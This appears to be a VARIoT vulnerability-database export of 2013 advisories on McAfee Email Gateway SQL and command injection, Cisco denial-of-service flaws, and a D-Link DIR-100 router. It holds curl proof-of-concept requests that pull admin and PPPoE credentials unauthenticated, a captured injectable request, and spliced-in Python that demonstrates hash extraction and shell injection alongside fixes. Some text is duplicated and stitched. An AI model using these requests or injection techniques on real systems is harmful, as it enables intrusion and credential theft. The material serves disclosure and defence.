VARIoT IoT vulnerabilities database
| VAR-201312-0316 | CVE-2013-7103 | McAfee Email Gateway Vulnerable to arbitrary command execution |
| CVSS V2: 9.0 | CVSS V3: - | Severity: HIGH |
McAfee Email Gateway 7.6 allows remote authenticated administrators to execute arbitrary commands via shell metacharacters in the value attribute in a (1) TestFile XML element or the (2) hostname. NOTE: this issue can be combined with CVE-2013-7092 to allow remote attackers to execute commands. McAfee Email and Web Security Appliance and Email Gateway are prone to multiple SQL-injection and remote command-execution vulnerabilities because they fail to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to execute arbitrary commands, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. McAfee Email Gateway (MEG) is a suite of email security solutions from McAfee. The solution offers incoming threat protection, outgoing encryption, data loss prevention, and more.
McAfee Email Gateway 7.6 multiple vulnerabilities
http://www.mcafee.com/us/products/email-gateway.aspx -- Has free trial
Many instances of SQL injection were found as an unprivileged read-only
authenticated user that allow the user to completely take over the accounts
of other users by using a stacked injection technique to run UPDATE
statements. Other techniques available are error-based, time-based, and
boolean-based injections.
Several remote command execution vulnerabilities were found as an
administrator which are run as the local root user. By utilising the SQL
injections as an unprivileged user, a user can escalate privileges by
updating the password hash of an admin, and ultimately run commands on the
server as root.
However, no data seems to be able to be exfiltrated via the command
injections. You may receive a connect back, but no commands can be run over
the connect-back. My solution to this was to pipe the results of commands
into a file in /tmp, then use the SQL injections to read the file from the
FS and return the results.
---------------------------------------------------
As a read-only user with reporting capabilities, many SQL injection vectors
exist when creating new reports based on filters. You can get to this part
of the web app by clicking the Reports menu item at the top-center. The
following request contains four exploitable SQL injections each exploitable
via a few different techniques:
POST /admin/cgi-bin/rpc/doReport/18 HTTP/1.1
Host: 172.31.16.87:10443
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain; charset=UTF-8
Referer: https://172.31.16.87:10443/admin/969bf547d36f6c7e4302952cf72a5ce3/en_US/html/index.html
Content-Length: 626
Cookie: SCMUserSettings=lastUser%3Dusername%26popcheck%3D1%26lang%3Den_US%26last_page_id%3Ddashboard; SHOW_BANNER_NOTICE=BannerShown%3D1; ws_session=SID%3D616BF3CC-DA8B-401D-9220-ACED9A0FCD86
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

{"id":"loadreport","locale":"en_US","commands":[{"name":"getDDSData","args":{"what":["events"],"filters":{"filter_period":"week","start_date":"Now","event_type":"ui_events","event_id":"all","reason":"all"},"date_range":"week","events_col":"edate","events_order":"DESC","events_offset":0,"events_nitems":50,"tz":480,"start_date":1385491876.405,"is_mail":false,"itemized_nitems":10,"itemized_offset":0,"emailstatus_nitems":50,"emailstatus_offset":0,"emailstatus_col":"edate","emailstatus_order":"DESC","dig_filters":[],"dig_category":"","dig_summarize":true,"init":true,"type":"ui_events"}}],"filterType":"system","autoconv":1}
Within the above request, the events_col, event_id, reason, events_order,
emailstatus_order, and emailstatus_col JSON keys are vulnerable to SQL
injection. You can capture the request with Burp Suite and alter each value
by adding an apostrophe to view the SQL error in the response. You can also
use sqlmap to try various techniques for exploitability.
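A server-side check for the six injectable keys named above, added here as an example and not code from the advisory or from the product: each key is mapped onto an identifier allow-list or a fixed pattern, which is the fix for this bug class, and the same function doubles as a WAF-style detector run over captured request bodies. The column names other than edate and the tampered_body helper are assumptions.

```python
import json
import re
from typing import List

# Identifiers the report endpoint may legitimately receive. Only "edate" appears
# in the captured request; the other column names are assumed placeholders for
# the real report schema.
ALLOWED_COLUMNS = {"edate", "event_type", "event_id", "reason"}
ALLOWED_ORDER = {"ASC", "DESC"}

# The six JSON keys the advisory identifies as injectable, grouped by the
# validation each needs. Column and order keys sit directly under "args";
# event_id and reason sit under "args.filters".
COLUMN_KEYS = ("events_col", "emailstatus_col")
ORDER_KEYS = ("events_order", "emailstatus_order")
FILTER_KEYS = ("event_id", "reason")
FILTER_VALUE = re.compile(r"^(all|[0-9]{1,10})$")  # literal "all" or a numeric id

# The request body captured in the advisory, with its original benign values.
CAPTURED_BODY = (
    '{"id":"loadreport","locale":"en_US","commands":[{"name":"getDDSData",'
    '"args":{"what":["events"],"filters":{"filter_period":"week","start_date":"Now",'
    '"event_type":"ui_events","event_id":"all","reason":"all"},"date_range":"week",'
    '"events_col":"edate","events_order":"DESC","events_offset":0,"events_nitems":50,'
    '"tz":480,"start_date":1385491876.405,"is_mail":false,"itemized_nitems":10,'
    '"itemized_offset":0,"emailstatus_nitems":50,"emailstatus_offset":0,'
    '"emailstatus_col":"edate","emailstatus_order":"DESC","dig_filters":[],'
    '"dig_category":"","dig_summarize":true,"init":true,"type":"ui_events"}}],'
    '"filterType":"system","autoconv":1}'
)


def validate_doreport_body(body: str) -> List[str]:
    """Return findings for one /admin/cgi-bin/rpc/doReport/18 request body.

    An empty list means every injectable key holds a value that can be mapped
    onto a fixed identifier or bound as a query parameter; anything else is
    rejected before it reaches the database. The check is the same whether it
    runs inside the handler or as a rule in front of the appliance.
    """
    findings: List[str] = []
    try:
        doc = json.loads(body)
    except json.JSONDecodeError as exc:
        return [f"body is not valid JSON: {exc}"]

    for cmd in doc.get("commands", []):
        if cmd.get("name") != "getDDSData":
            continue
        args = cmd.get("args", {})
        filters = args.get("filters", {})

        # Column names are identifiers, so they can only be allow-listed.
        for key in COLUMN_KEYS:
            val = args.get(key)
            if val is not None and (not isinstance(val, str) or val not in ALLOWED_COLUMNS):
                findings.append(f"{key}: {val!r} is not an allowed column")

        # Sort direction is a two-value enum.
        for key in ORDER_KEYS:
            val = args.get(key)
            if val is not None and (not isinstance(val, str) or val not in ALLOWED_ORDER):
                findings.append(f"{key}: {val!r} is not ASC or DESC")

        # Filter values are "all" or a numeric id; both bind cleanly as parameters.
        for key in FILTER_KEYS:
            val = filters.get(key)
            if val is not None and not (isinstance(val, str) and FILTER_VALUE.match(val)):
                findings.append(f"{key}: {val!r} is not 'all' or a numeric id")
    return findings


def tampered_body(key: str, value: str) -> str:
    """Constructed test helper: the captured body with one key's value replaced."""
    doc = json.loads(CAPTURED_BODY)
    args = doc["commands"][0]["args"]
    target = args["filters"] if key in FILTER_KEYS else args
    target[key] = value
    return json.dumps(doc)


if __name__ == "__main__":
    print("captured body:", validate_doreport_body(CAPTURED_BODY) or "clean")
    # The apostrophe probe the advisory describes is caught before any SQL runs.
    print("events_col probe:", validate_doreport_body(tampered_body("events_col", "edate'")))
```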
------------------------------------------------------
Many remote command execution vulnerabilities exist for administrator
users. Every vector I found was being run as the root user and they all
exist within a single request. As an administrator, go to the System tab
in the top menu. You will be presented with general server settings. Remove
the last letter of the hostname, and replace it back. You will now have a
green checkmark in the top right of the web application. Click this, then
click OK on the dialog that pops up in the web app. The next captured
request will be the request susceptible to command execution. It is a very
large request with XML contained in JSON. Because this makes sense.
Within this XML, you may search for any XML element whose "name" attribute
contains TestFile. Any of these elements are susceptible to command
injection within the "value" attribute. These filenames seem to be passed
to a utility like 'test' to ensure whether or not it exists. By using shell
metacharacters, you can execute arbitrary commands on the system as root.
The hostname within this request is also susceptible to command injection
via shell metacharacters.
You may also search for any XML element called Command. Each of these
elements contains a small command to be run on a given event. You may alter
any of these to be run as root.
You may also search for an XML element called Script. This is used to
manage the cron jobs (make sure the corresponding Enabled element is set to
"1" instead of "0"). You may alter or create any cron jobs that will be run
as root.
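A defensive counterpart to the TestFile, hostname, Command and Script vectors described above, added here as an example and not code from the advisory or from McAfee: it replaces the shell-driven existence test with an in-process check, validates the hostname against the RFC 1123 label grammar, and audits a constructed config fragment for values that could never be passed to a shell safely. The element names Item, Hostname, Command, Job, Script and Enabled and all sample values are assumptions, not the product's schema.

```python
import os
import re
import xml.etree.ElementTree as ET
from typing import List

# Strict allow-lists. A value that fails these is rejected before anything is
# executed; nothing in this module is ever handed to /bin/sh.
PATH_RE = re.compile(r"^/[A-Za-z0-9_./-]*$")
COMMAND_RE = re.compile(r"^/[A-Za-z0-9_./-]+( [A-Za-z0-9_./=-]+)*$")
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)

# Constructed configuration fragment in the shape the advisory describes:
# elements whose "name" contains TestFile with a path in "value", the hostname,
# an event Command, and a cron Job with an Enabled flag and a Script value.
SAMPLE_CONFIG = """<config>
  <Hostname value="meg-01.example.internal"/>
  <Item name="LogTestFile" value="/var/log/mail.log"/>
  <Item name="SpoolTestFile" value="/var/spool/mail;id"/>
  <Command name="OnQueueFull" value="/usr/local/bin/notify-admin"/>
  <Job><Enabled>1</Enabled><Script value="/usr/local/bin/rotate.sh &amp; /tmp/helper"/></Job>
</config>"""


def check_test_file(value: str) -> str:
    """Replace `test -e <value>` run through a shell with an in-process check.

    Returns "invalid" (value rejected, filesystem never touched), "missing"
    or "present". Parent-directory traversal is rejected as well.
    """
    if not PATH_RE.match(value) or ".." in value.split("/"):
        return "invalid"
    return "present" if os.path.exists(value) else "missing"


def valid_hostname(value: str) -> bool:
    """RFC 1123 hostname: alphanumeric labels, hyphens inside labels only."""
    return bool(HOSTNAME_RE.match(value))


def audit_config(xml_text: str) -> List[str]:
    """Report every value in the config that must not reach a shell as-is."""
    root = ET.fromstring(xml_text)
    findings: List[str] = []
    for item in root.iter("Item"):
        name = item.get("name", "")
        value = item.get("value", "")
        if "TestFile" in name and check_test_file(value) == "invalid":
            findings.append(f"{name}: value {value!r} is not a plain absolute path")
    for host in root.iter("Hostname"):
        value = host.get("value", "")
        if not valid_hostname(value):
            findings.append(f"Hostname: value {value!r} is not a valid hostname")
    for cmd in root.iter("Command"):
        value = cmd.get("value", "")
        if not COMMAND_RE.match(value):
            findings.append(
                f"Command {cmd.get('name', '?')}: value {value!r} contains shell metacharacters"
            )
    for job in root.iter("Job"):
        enabled = (job.findtext("Enabled") or "0").strip()
        script = job.find("Script")
        value = script.get("value", "") if script is not None else ""
        if not COMMAND_RE.match(value):
            findings.append(
                f"Script (Enabled={enabled}): value {value!r} contains shell metacharacters"
            )
    return findings


if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG):
        print(finding)
```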
-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
| VAR-201312-0317 | CVE-2013-7104 | McAfee Email Gateway Vulnerabilities in arbitrary command execution |
| CVSS V2: 9.0 | CVSS V3: - | Severity: HIGH |
McAfee Email Gateway 7.6 allows remote authenticated administrators to execute arbitrary commands by specifying them in the value attribute in a (1) Command or (2) Script XML element. NOTE: this issue can be combined with CVE-2013-7092 to allow remote attackers to execute commands. McAfee Email Gateway contains a command execution vulnerability. McAfee Email and Web Security Appliance and Email Gateway are prone to multiple SQL-injection and remote command-execution vulnerabilities because they fail to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to execute arbitrary commands, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. McAfee Email Gateway (MEG) is a suite of email security solutions from McAfee. The solution offers incoming threat protection, outgoing encryption, data loss prevention, and more.
| VAR-201312-0309 | CVE-2013-7092 | McAfee Email Gateway of /admin/cgi-bin/rpc/doReport/18 In SQL Injection vulnerability |
| CVSS V2: 6.5 | CVSS V3: - | Severity: MEDIUM |
Multiple SQL injection vulnerabilities in /admin/cgi-bin/rpc/doReport/18 in McAfee Email Gateway 7.6 allow remote authenticated users to execute arbitrary SQL commands via the (1) events_col, (2) event_id, (3) reason, (4) events_order, (5) emailstatus_order, or (6) emailstatus_col JSON keys.
Exploiting these issues could allow an attacker to execute arbitrary commands, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. McAfee Email Gateway (MEG) is a suite of email security solutions from McAfee. The solution offers incoming threat protection, outgoing encryption, data loss prevention, and more. A SQL injection vulnerability exists in /admin/cgi-bin/rpc/doReport/18 in MEG version 7.6.
boolean-based injections.
Several remote command execution vulnerabilities were found as an
administrator which are run as the local root user. By utilising the SQL
injections as an unprivileged user, a user can escalate privileges by
updating the password hash of an admin, and ultimately run commands on the
server as root.
However, no data seems to be able to be exfiltrated via the command
injections. You may receive a connect back, but no commands can be run over
the connect-back. My solution to this was to pipe the results of commands
into a file in /tmp, then use the SQL injections to read the file from the
FS and return the results.
---------------------------------------------------
As a read-only user with reporting capabilities, many SQL injection vectors
exist when creating new reports based on filters. You can get to this part
of the web app by clicking the Reports menu item at the top-center. The
following request contains four exploitable SQL injections each exploitable
via a few different techniques:
POST /admin/cgi-bin/rpc/doReport/18 HTTP/1.1
Host: 172.31.16.87:10443
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101
Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;q=3D0.8
Accept-Language: en-US,en;q=3D0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain; charset=3DUTF-8
Referer:
https://172.31.16.87:10443/admin/969bf547d36f6c7e4302952cf72a5ce3/en_US/htm=
l/index.html
Content-Length: 626
Cookie:
SCMUserSettings=3DlastUser%3Dusername%26popcheck%3D1%26lang%3Den_US%26last_=
page_id%3Ddashboard;
SHOW_BANNER_NOTICE=3DBannerShown%3D1;
ws_session=3DSID%3D616BF3CC-DA8B-401D-9220-ACED9A0FCD86
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"id":"loadreport","locale":"en_US","commands":[{"name":"getDDSData","args"=
:{"what":["events"],"filters":{"filter_period":"week","start_date":"Now","e=
vent_type":"ui_events","event_id":"all","reason":"all"},"date_range":"week"=
,"events_col":"edate","events_order":"DESC","events_offset":0,"events_nitem=
s":50,"tz":480,"start_date":1385491876.405,"is_mail":false,"itemized_nitems=
":10,"itemized_offset":0,"emailstatus_nitems":50,"emailstatus_offset":0,"em=
ailstatus_col":"edate","emailstatus_order":"DESC","dig_filters":[],"dig_cat=
egory":"","dig_summarize":true,"init":true,"type":"ui_events"}}],"filterTyp=
e":"system","autoconv":1}
Within the above request, the events_col, event_id, reason, events_order,
emailstatus_order, and emailstatus_col JSON keys are vulnerable to SQL
injection. You can capture the request with Burp Suite and alter each value
by appending an apostrophe to view the SQL error in the response. You can also
point sqlmap at the request to try the various exploitation techniques
(stacked, error-based, time-based and boolean-based).
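The sort-parameter injection described above, as an added example that is not part of the original advisory and not McAfee's code: a sqlite3-backed stand-in for the report handler (the schema, table and column names are assumed; the advisory only names the JSON keys), the boolean-based inference an attacker can drive through an injectable ORDER BY to read another user's password hash, the stacked-query UPDATE that the advisory's account takeover relied on, and the allow-list fix.

```python
import sqlite3
import string

# Constructed stand-in for the appliance's reporting database. The real
# table and column names are not in the advisory; only the JSON keys are.
SCHEMA = """
CREATE TABLE users (name TEXT PRIMARY KEY, pwhash TEXT, role TEXT);
INSERT INTO users VALUES ('admin', 'orig-hash', 'admin');
INSERT INTO users VALUES ('reader', 'reader-hash', 'readonly');
CREATE TABLE events (eid INTEGER PRIMARY KEY, edate TEXT, reason TEXT);
INSERT INTO events VALUES (1, '2013-11-25', 'ok');
INSERT INTO events VALUES (2, '2013-11-26', 'fail');
INSERT INTO events VALUES (3, '2013-11-27', 'ok');
"""


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def report_vulnerable(db, events_col, events_order):
    """The anti-pattern: the sort column and direction taken from the JSON
    body are pasted straight into the statement. Identifiers cannot be bound
    as parameters, which is why this bug is so common in ORDER BY clauses."""
    sql = f"SELECT eid FROM events ORDER BY {events_col} {events_order}"
    return [row[0] for row in db.execute(sql)]


def report_stacked(db, events_col, events_order):
    """Same bug on a driver that accepts several ';'-separated statements;
    sqlite3.executescript stands in for such a driver. Only the side effect
    of the injected statement matters here, so results are discarded."""
    db.executescript(f"SELECT eid FROM events ORDER BY {events_col} {events_order}")


def leak_admin_hash(db, charset=string.ascii_lowercase + string.digits + "-"):
    """Boolean-based inference through the vulnerable ORDER BY: a CASE
    expression sorts by eid when the guessed character is right and by -eid
    when it is wrong, so the first eid returned is the oracle bit."""
    recovered = ""
    while True:
        for ch in charset:
            probe = (
                "(CASE WHEN substr((SELECT pwhash FROM users WHERE name='admin'),"
                f"{len(recovered) + 1},1)='{ch}' THEN eid ELSE -eid END)"
            )
            if report_vulnerable(db, probe, "ASC")[0] == 1:
                recovered += ch
                break
        else:
            return recovered  # no candidate matched: end of the string


ALLOWED_COLS = {"edate", "eid", "reason"}
ALLOWED_ORDER = {"ASC", "DESC"}


def report_hardened(db, events_col, events_order):
    """Fix: accept only allow-listed identifiers and build the statement from
    the allow-listed values, never from the request text itself."""
    if events_col not in ALLOWED_COLS or events_order.upper() not in ALLOWED_ORDER:
        raise ValueError("rejected sort parameter")
    sql = f"SELECT eid FROM events ORDER BY {events_col} {events_order.upper()}"
    return [row[0] for row in db.execute(sql)]


def hardened_rejects(db, events_col, events_order):
    """True when the hardened handler refuses the given parameters."""
    try:
        report_hardened(db, events_col, events_order)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = fresh_db()
    print("normal report:", report_vulnerable(db, "edate", "DESC"))
    print("admin hash via boolean inference:", leak_admin_hash(db))
    report_stacked(db, "edate", "DESC; UPDATE users SET pwhash='attacker-hash' WHERE name='admin'")
    print("admin hash after stacked UPDATE:",
          db.execute("SELECT pwhash FROM users WHERE name='admin'").fetchone()[0])
```

The allow-list is the right shape of fix for this class of bug: parameter binding protects values, not identifiers, so a column or direction taken from the client has to be compared against the finite set the query actually supports.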
------------------------------------------------------
Many remote command execution vulnerabilities exist for administrator
users. Every vector I found was being run as the root user, and they all
exist within a single request. As an administrator, go to the System tab
in the top menu. You will be presented with general server settings. Remove
the last letter of the hostname, then put it back. You will now have a
green checkmark in the top right of the web application. Click this, then
click OK on the dialog that pops up in the web app. The next captured
request will be the request susceptible to command execution. It is a very
large request with XML contained in JSON. Because this makes sense.
Within this XML, you may search for any XML element whose "name" attribute
contains TestFile. Any of these elements are susceptible to command
injection within the "value" attribute. These filenames seem to be passed
to a utility like 'test' to check whether or not the file exists. By using
shell metacharacters, you can execute arbitrary commands on the system as
root. The hostname within this request is also susceptible to command
injection via shell metacharacters.
You may also search for any XML element called Command. Each of these
elements contains a small command to be run on a given event. You may alter
any of these to be run as root.
You may also search for an XML element called Script. This is used to
manage the cron jobs (make sure the corresponding Enabled element is set to
"1" instead of "0"). You may alter or create any cron jobs that will be run
as root.
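The 'test'-style existence check the advisory describes, as an added example that is not code from the advisory or from McAfee: the shell-spliced check beside a version that never hands the value to a shell, and a scanner over a constructed XML fragment (the element layout is assumed; the advisory names only the name and value attributes) that flags TestFile values carrying shell metacharacters. demo() runs an injection payload against both checkers and reports whether the injected command actually executed; it assumes a POSIX /bin/sh is present.

```python
import os
import subprocess
import tempfile
import xml.etree.ElementTree as ET

# Characters that change meaning once a shell parses the string.
SHELL_META = set(";|&$`<>()\n\r\\\"'*?")


def file_exists_vulnerable(path):
    """Anti-pattern matching the advisory: the value is spliced into a command
    line that a shell then parses, so ';', '`' and '$(...)' turn a file
    existence check into arbitrary command execution as whatever user runs it."""
    return subprocess.run(f"test -e {path}", shell=True).returncode == 0


def file_exists_hardened(path):
    """Fix: validate the value, then check it without any shell involved. If a
    subprocess were really needed, argv would be passed as a list so the path
    is a single argument and metacharacters are never interpreted."""
    if not os.path.isabs(path) or any(c in SHELL_META for c in path):
        raise ValueError(f"rejected path: {path!r}")
    return os.path.exists(path)


def find_unsafe_testfile_values(xml_text):
    """Walk the XML config blob and return (name, value) for every element
    whose name attribute contains 'TestFile' and whose value carries shell
    metacharacters. Useful both for auditing a captured request and as the
    server-side check the appliance was missing."""
    hits = []
    for el in ET.fromstring(xml_text).iter():
        name = el.get("name", "")
        value = el.get("value", "")
        if "TestFile" in name and any(c in SHELL_META for c in value):
            hits.append((name, value))
    return hits


# Constructed fragment; the real request's element names are not in the advisory.
SAMPLE_XML = """<Config>
  <Setting name="Hostname" value="mail-gw"/>
  <Setting name="TestFile1" value="/var/log/mail.log"/>
  <Setting name="TestFile2" value="/etc/passwd; id > /tmp/out"/>
</Config>"""


def demo():
    """Run both checkers against an injection payload and report whether the
    injected command executed (a marker file appears) for each of them."""
    workdir = tempfile.mkdtemp()
    marker = os.path.join(workdir, "injected")
    payload = f"/nonexistent; echo pwned > {marker}"

    file_exists_vulnerable(payload)  # the shell runs the echo after 'test'
    vulnerable_executed = os.path.exists(marker)
    if vulnerable_executed:
        os.remove(marker)

    try:
        file_exists_hardened(payload)
    except ValueError:
        pass  # rejected before anything could run
    hardened_executed = os.path.exists(marker)
    return vulnerable_executed, hardened_executed


if __name__ == "__main__":
    print("injected command ran (vulnerable, hardened):", demo())
    print("suspicious TestFile values:", find_unsafe_testfile_values(SAMPLE_XML))
```

The same reasoning applies to the hostname value in the request: a hostname that passes an RFC 1123 character check cannot contain any of the characters in SHELL_META, so validating it against that grammar before use closes the second vector as well.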
-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
| VAR-201312-0068 | CVE-2013-2825 | Elecsys Director Industrial Communication Gateway (Linux kernel based) Outstation component DNP3 service denial of service (DoS) vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The DNP3 service in the Outstation component on Elecsys Director Gateway devices with kernel 2.6.32.11ael1 and earlier allows remote attackers to cause a denial of service (CPU consumption and communication outage) via crafted input. Elecsys Director Gateway is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause denial-of-service conditions. The Elecsys Director Industrial Communication Gateway is a family of industrial data communication gateway devices from Elecsys, a US company. The device provides data acquisition, automatic communication failover, network security, bandwidth management, protocol conversion, and more.
| VAR-201312-0235 | CVE-2013-6690 | Cisco Prime Collaboration Assurance component web interface cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in the web interface in the Assurance component in Cisco Prime Collaboration allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug IDs CSCui92643, CSCui94038, and CSCui94161. The vendor has confirmed this vulnerability and tracks it as Bug IDs CSCui92643, CSCui94038, and CSCui94161. Arbitrary web script or HTML may be injected by a third party.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug IDs CSCui92643, CSCui94038, and CSCui94161. Cisco Prime Collaboration is a set of enterprise collaboration network management solutions from Cisco. The solution provides unified communications and video collaboration network management through a single management console, and rapid deployment of communication sites. The vulnerability stems from the web interface not adequately sanitizing user input. A remote attacker can exploit it to inject arbitrary script or HTML and obtain the user's access credentials.
| VAR-201312-0452 | CVE-2013-6703 | Cisco ONS 15454 controller card TLS/SSLv3 module denial of service (DoS) vulnerability |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
The TLS/SSLv3 module on Cisco ONS 15454 controller cards allows remote attackers to cause a denial of service (card reset) via crafted (1) TLS or (2) SSLv3 packets, aka Bug ID CSCuh34787.
An attacker can exploit this issue to cause the control card to reset, denying service to legitimate users.
This issue is being tracked by Cisco bug ID CSCuh34787. Cisco ONS 15454 is an optical multi-service transport platform from Cisco. The platform leverages optical transport technologies such as Resilient Packet Ring (RPR), SDH, and DWDM/CWDM to integrate Ethernet, IP, storage, and TDM services and deliver next-generation voice and data services. The controller card is one of the platform's control cards. The vulnerability is caused by the TLS/SSLv3 module not properly handling crafted TLS or SSLv3 packets.
| VAR-201312-0453 | CVE-2013-6704 | Cisco IOS XE denial of service (DoS) vulnerability |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Cisco IOS XE does not properly manage memory for TFTP UDP flows, which allows remote attackers to cause a denial of service (memory consumption) via TFTP (1) client or (2) server traffic, aka Bug IDs CSCuh09324 and CSCty42686. Cisco IOS is the internetwork operating system used on most Cisco routers and switches. A denial of service vulnerability exists in Cisco IOS XE Software. An attacker can exploit the vulnerability to consume excess memory and cause the device to crash, denying service to legitimate users.
This issue is being tracked by Cisco Bug IDs CSCuh09324 and CSCty42686. The vulnerability is caused by the program not properly freeing memory.
| VAR-201312-0454 | CVE-2013-6705 | Cisco IOS and IOS XE IP Device Tracking denial of service (DoS) vulnerability |
CVSS V2: 6.1 CVSS V3: - Severity: MEDIUM |
The IP Device Tracking (IPDT) feature in Cisco IOS and IOS XE allows remote attackers to cause a denial of service (IPDT AVL corruption and device reload) via a crafted sequence of ARP packets, aka Bug ID CSCuh38133. Cisco IOS is the internetwork operating system used on most Cisco routers and switches. The vulnerability is due to corruption of the IPDT AVL tree. Sending a crafted sequence of ARP packets to an affected device triggers the vulnerability and reloads the device. Cisco IOS and IOS XE Software are prone to a remote denial-of-service vulnerability.
Successful exploits may allow attackers to cause the device to reload, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCuh38133
| VAR-202002-0670 | CVE-2013-7055 | D-Link DIR-100 Vulnerable to insufficient protection of credentials |
CVSS V2: 5.0 CVSS V3: 9.8 Severity: CRITICAL |
D-Link DIR-100 4.03B07 discloses PPTP and PPPoE information. The D-Link DIR-100 contains a vulnerability related to insufficient protection of credentials. Information may be obtained or tampered with, and a denial of service (DoS) may result. The D-Link DIR-100 Ethernet Broadband Router is a broadband router device. It fails to properly restrict access to privileged functionality, allowing remote attackers to retrieve information such as the PPTP, PPPoE, and DynDNS usernames and passwords without authenticating. D-Link DIR-100 is prone to the following security vulnerabilities:
1. An authentication-bypass vulnerability
2. Multiple information-disclosure vulnerabilities
3. A cross-site request-forgery vulnerability
4. A cross-site scripting vulnerability
An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass the authentication mechanism, and gain access to potentially sensitive information. Other attacks are also possible.
* Title: Router D-Link DIR-100 Multiple Vulnerabilities
* Date: 2013-12-18
* Author: Felix Richter
* Contact: root@euer.krebsco.de
* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip
* Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip
* Report Version: 2.0
* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt
* Vulnerable: D-Link DIR-100
* Hardware Revision: D1
* Software Version: 4.03B07 (from 2012-04-10)
* CVE Numbers:
* CWE-287 Authentication Issues: CVE-2013-7051
* CWE-255 Issues with Credential Management: CVE-2013-7052
* CWE-352 Cross-Site Request Forgery: CVE-2013-7053
* CWE-79 Cross-Site Scripting: CVE-2013-7054
* CWE-200 Information Disclosure: CVE-2013-7055
* Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1
* State: Patched by Vendor
* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8
# Table of Contents
1. Background
2. Vulnerability Description
3. Technical Description of the Vulnerabilities
4. Severity and Remediation
5. Timeline
# 1. Background
The DIR-100 is designed for easy and robust connectivity among heterogeneous
standards-based network devices. Computers can communicate directly with this
router for automatic opening and closing of UDP/TCP ports to take full
advantage of the security provided without sacrificing functionality of on-line
applications.
# 2 Vulnerability Description
Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet
Broadband Router Revision D (and potentially other devices sharing the
affected firmware) that could allow a remote attacker to:
- Retrieve the administrator password without authentication, leading to
authentication bypass [CWE-255]
- Retrieve sensitive configuration parameters such as the PPPoE username and
password without authentication [CWE-200]
- Execute privileged commands without authentication through a race
condition, i.e. weak authentication enforcement [CWE-287]
- Send a crafted request to a victim whose browser then executes arbitrary
commands on the device (CSRF) [CWE-352]
- Store arbitrary JavaScript code which will be executed when a victim
accesses the administrator interface [CWE-79]
The CVE numbers assigned to these vulnerabilities are listed in the report
header above.
# 3 Technical Description of the Vulnerabilities
## 3.0 The DIR-100 Web Interface and CGI
The DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for
unauthenticated users and `/cli.cgi` for authenticated requests.
The list of features provided by each cgi-script can be retrieved with:
curl 'http://192.168.1.104/cliget.cgi?cmd=help'
# and respectively when authenticated
curl 'http://192.168.1.104/cli.cgi?cmd=help'
## 3.1 Authentication Bypass
### Description
The administrator password is not protected in any way on the device: any
attacker with network access to the administration interface, which listens
on port 80, can retrieve it. The request that retrieves the administrator
password does not need to be authenticated.
### Proof of Concept
The web interface provides two distinct ways to retrieve the administrator
password:
curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'
## 3.2 Weak Authentication
### Description
As soon as a user is logged into the administration interface, the cli CGI
is `unlocked` and can be used without authenticating first, because the
cgi-script does not check any other authentication parameter such as
cookies or HTTP parameters. The only access check is whether the source
IP address is the same as the one that logged in.
### Proof of Concept
# open the router interface in a web browser and log in
firefox 'http://192.168.0.1/'
# open a new terminal or another web-browser which is currently not logged
# in and try to access
curl 'http://192.168.0.1/cli.cgi?cmd=help'
# this request will be authenticated and it will not be redirected to the
# login page. If no user is logged in, the request will be redirected to
# the login
## 3.3 Retrieve sensitive information
### Description
Besides retrieving the administrator password without authentication, it is
possible to retrieve other sensitive configuration from the device as well,
such as the PPTP and PPPoE username and password, the configured DynDNS
username and password, and the configured mail-log credentials, when these
parameters are set.
No authentication is required.
### Proof of Concept
curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
